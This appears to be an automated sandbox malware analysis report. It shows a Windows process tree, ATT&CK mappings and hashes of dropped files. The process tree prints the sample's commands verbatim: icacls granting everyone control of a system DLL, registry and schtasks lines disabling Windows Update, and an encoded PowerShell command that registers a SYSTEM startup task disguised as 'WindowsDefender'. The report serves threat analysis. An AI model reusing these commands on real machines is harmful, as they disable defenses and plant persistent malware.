        Suspicious use of AdjustPrivilegeToken
        
        PID:3484
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4964
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:3888
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:1384
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:2452
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:1064
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        7⤵
        
        PID:1940
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
        7⤵
        
        PID:1880
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
        7⤵
        
        PID:4644
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        7⤵
        
        PID:3700
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
        7⤵
        
        PID:4528
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
        7⤵
        
        PID:3120
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        7⤵
        
        PID:4712
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4780
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3676
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1068
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3864
      - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        6⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3912
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /run /tn "WindowsDefender"
        7⤵
        
        PID:736
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:864
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:4908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2644

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2340

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2324

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:1980

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1308

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3368

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4540
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 440 -p 4164 -ip 4164
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2544
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 496 -p 3276 -ip 3276
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4780
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 436 -p 2404 -ip 2404
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:1684
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 500 -p 2500 -ip 2500
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4868
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 224 -p 832 -ip 832
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2864
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 408 -ip 408
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2332
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 456 -p 1732 -ip 1732
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4740
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 224 -p 2400 -ip 2400
  2⤵
  PID:1524
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 600 -p 4336 -ip 4336
  2⤵
  PID:2768
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 500 -p 4620 -ip 4620
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:1716
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 600 -p 4744 -ip 4744
  2⤵
  PID:1228
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 4236 -ip 4236
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4192
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 608 -p 1948 -ip 1948
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:3280
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 592 -p 3084 -ip 3084
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4556
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 436 -p 1240 -ip 1240
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:944
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 580 -p 3684 -ip 3684
  2⤵
  PID:3532
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 600 -p 1036 -ip 1036
  2⤵
  PID:4764
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 592 -p 3148 -ip 3148
  2⤵
  PID:4464
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 224 -p 2424 -ip 2424
  2⤵
  PID:2956
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 4476 -ip 4476
  2⤵
  PID:3668
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 556 -p 1228 -ip 1228
  2⤵
  PID:4788
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 580 -p 3132 -ip 3132
  2⤵
  PID:4892
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 556 -p 224 -ip 224
  2⤵
  PID:1844
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 456 -p 4240 -ip 4240
  2⤵
  PID:2176
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 4860 -ip 4860
  2⤵
  PID:3012
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 456 -p 1644 -ip 1644
  2⤵
  PID:3024
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 3448 -ip 3448
  2⤵
  PID:2004
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 504 -p 3120 -ip 3120
  2⤵
  PID:2552
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 576 -p 3772 -ip 3772
  2⤵
  PID:1320
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 436 -p 3860 -ip 3860
  2⤵
  PID:4692
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 4688 -ip 4688
  2⤵
  PID:1820
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 4940 -ip 4940
  2⤵
  PID:2360

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2052

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2404
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2404 -s 656
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3720

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2500
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2500 -s 792
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:4668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:832
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 832 -s 420
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3012

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:408
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 408 -s 780
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1680

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1732
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1732 -s 484
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3448

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2400
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2400 -s 228
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3456

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4620
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4620 -s 744
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:4256

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4336
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4336 -s 680
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:940

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4744
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4744 -s 384
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4236
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4236 -s 356
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1892

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1948
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1948 -s 356
  2⤵
  - Program crash
  PID:4544

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3084
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3084 -s 484
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1140

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1240
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1240 -s 492
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3684 -s 492
1⤵
- Program crash
PID:1940

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1036 -s 356
1⤵
- Program crash
PID:1864

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3148 -s 432
1⤵
- Program crash
PID:2916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2424 -s 468
1⤵
- Program crash
PID:3632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4476 -s 488
1⤵
- Program crash
PID:3692

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1228
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1228 -s 244
  2⤵
  - Program crash
  PID:5004

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3132 -s 500
1⤵
- Program crash
PID:4644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 224 -s 420
1⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4544

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4240 -s 472
1⤵
- Program crash
PID:2732

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4860 -s 492
1⤵
- Program crash
PID:4324

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1644 -s 400
1⤵
- Program crash
PID:3100

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3448 -s 356
1⤵
- Program crash
PID:2432

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3120 -s 480
1⤵
- Program crash
PID:1732

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3772 -s 432
1⤵
- Program crash
PID:1436

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3860 -s 444
1⤵
- Program crash
PID:3424

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4688 -s 396
1⤵
- Program crash
PID:2928

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4940 -s 496
1⤵
- Program crash
PID:3720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Platform\Defender\update.exe

Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Program Files\Platform\Defender\update.exe

Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER98B5.tmp.csv

Filesize
36KB

MD5
243d5f63c7130bb365b36bd606086e46

SHA1
a1477b17e92e6210d423a7084c1ed794043397c7

SHA256
48dac6f702967bfa16392d24bf8cb4577600bfb3ec0328b969c4d3eb707de2ef

SHA512
646d02c1bbb4098b9b2e8c1c2a2fe31807048a61e232ce3abeab1cf1fb50e3094201a9ebf06c7f2d2c789e583bd59d6716e70c302e41c8d61fcbf4bf9e238697

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER98D5.tmp.txt

Filesize
13KB

MD5
63cf9f11b7acbcc3a0974922d11b9b10

SHA1
87e6fd212abd80650f88c07e158d30bdd8273186

SHA256
8851458f8fe3caca2b1b9a78ece5fae88beebc6a32b7aca35d445146e12a6f24

SHA512
25b23f8dfa5df5d26011c3eeda7fd1c3a341dce99826b2a7968ae4e1a1371cb3cacf4ff0a7e61558991121809270ab99682157a2beba09e03139477c4e0cec7a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B09.tmp.csv

Filesize
35KB

MD5
03100eacafb083f5432d7f67ed015f74

SHA1
967b38bebd0329c7d9c32bed301e624317a6031a

SHA256
e01d51af096f2af59d0a8124a48aaebc0646e882e0859b50524a9425df837378

SHA512
3affc54f5914a27e8b603ddd8b5871d5e20d4fd4f1a49e8de0d71f76a66d3694fe53f33455c9898038c284f1acc69094df2177959980c537f7194958b9e89905

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B67.tmp.txt

Filesize
13KB

MD5
e287a69b04340d41cba0f05926076339

SHA1
3ff5b95fc2ee7a9cc45368548b97dbb1e03462ce

SHA256
9e9dd8b9718f232bcd3cbf589e7aad7bdc1170b53159e7375ec99530df101272

SHA512
d6bb99aaa09491715742d178639a42e546095b921b95b675e069bfd4bf2f43fc7e8bf65e04e3d9d30567f268f93c0943cd5d23566b7261294b9d9f27745773d0

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E18.tmp.csv

Filesize
36KB

MD5
d02eba271c159725647c77f651e772e0

SHA1
71eb18a0b8942fd7b27028f9932ea371d4dc1d29

SHA256
5b4b7d628cd830f2f69b823b8c27ef67635d372981de7d59d8f6e24158fa789e

SHA512
68881c3e54b83ce96f0645352109a5e060ad16ac3dcf4b7d3ace0388d1a90ecfb1ddcf9252ae693be05f679733c1f25930244560c65f78e1006e289eb5692319

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E48.tmp.txt

Filesize
13KB

MD5
bbbe2eaad759d3f30ad8e9eae34945ec

SHA1
a603e6b3659c1713613aa5ca5087015f15fac9d0

SHA256
550818128aa84b0a2383e2e5229a37e8106d09f06a26bfe4cb668b7b5045145e

SHA512
5800d514c8c5a0fbea27bcf367dc34ed975b65ee483a337889d97cc7724ceb3084053e2430f101756ef21c8b04cd332e8d988d5394f87074a3cdf902376cdbd8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F23.tmp.csv

Filesize
35KB

MD5
c351a34de9b920b560a2c7776c522e40

SHA1
f0ae213c014eb7ee43d657b4a737436d6a11e369

SHA256
79b4665eef394c9dcec1db4a18054a9996d30f07b573f356b5e5fab8b2fdaca6

SHA512
b0ea2e7bcb6ba1790a2721af493e0a3c63e190bbb8652f00bf80a54c5d2b1fab28e20de3c2ae490a471d0d0e2e822256d5e84a532b4d61683f5042da616adbbb

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F82.tmp.txt

Filesize
13KB

MD5
7ff390e0d3b069d66815b7f6a1834a7a

SHA1
d2823bdb0282c416e7a63aeb69f1ea7ccbba8d78

SHA256
2c1dd87746d8a34e22f0ac4020579252431c80f92be37d15473e5817abef65fa

SHA512
de8eb1ef9dc7e3bffa81d8003f6a6e78ca9b72d8c750a6307ea1df8808602d6db6d161feda4ba08d8af38fc88cf33b584a52f88b5b9f71e46039de32c9f44d19

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4D3.tmp.csv

Filesize
36KB

MD5
1643ccef946fb2ed379cf3e29c0260a4

SHA1
f54725cd15947387d4a5842ad27050dddef00fe1

SHA256
80ad2a9ff737bc816a04cba33c111795c13d72612c3a7b67840d7dcd6651941d

SHA512
ffc526337913f2981860053f3450a03c467246580daae604ee9741a290855c32b2b55701c770d8455bbef589cace0c1737a02f6391b621c3e0839a8871fe6eb2

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4E3.tmp.csv

Filesize
36KB

MD5
af9dd512c51bec0f4188a233a8405236

SHA1
7bd7ba1a6529f441b5b8e44da2a516d7a525d9b3

SHA256
9c32dcfdce4c40becd0389a658e1c2cef802d34cb21ea2989ed03b8112376a89

SHA512
545e5454617cca1221be769abda3f353cecc039e1db766bc07aebd9d56c0f0184c6112fbdcd97792c858364b589f977959955b2a116e8a8cbe688430d924d267

Download Submit
